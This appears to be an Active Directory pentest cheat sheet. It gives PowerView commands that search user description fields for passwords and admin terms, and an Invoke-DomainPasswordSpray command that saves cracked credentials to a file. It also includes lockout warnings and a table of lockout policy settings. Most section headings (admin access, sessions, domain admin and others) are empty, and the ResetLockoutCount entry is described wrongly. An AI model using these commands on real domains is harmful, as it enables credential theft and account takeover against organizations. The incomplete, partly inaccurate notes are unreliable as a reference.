USER HUNTING


HUNTING JUICY NOTE

Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
...

HUNTING ADMIN ACCESS


HUNTING PSREMOTE ACCESS


HUNTING WMI ACCESS


HUNTING ADMIN


HUNTING SESSION


HUNTING DOMAIN ADMIN


PASSWORD SPRAYING

# CHECK POLICY AND CARE TO NOT LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
:warning: CHECK POLICY AND CARE TO NOT LOCK ACCOUNTS
:warning: VERY NOISY

Setting Key Explaination
LockoutDuration The number of minutes that a locked-out account MUST remain locked out before automatically becoming unlocked.
-1 = MUST be unclock by admin
other = number of minutes
LockoutBadCount Number of failed logon attempts after which a user account MUST be locked out.
ResetLockoutCount Number of minutes after a failed logon attempt that the account MUST be locked out

PWDLASTSET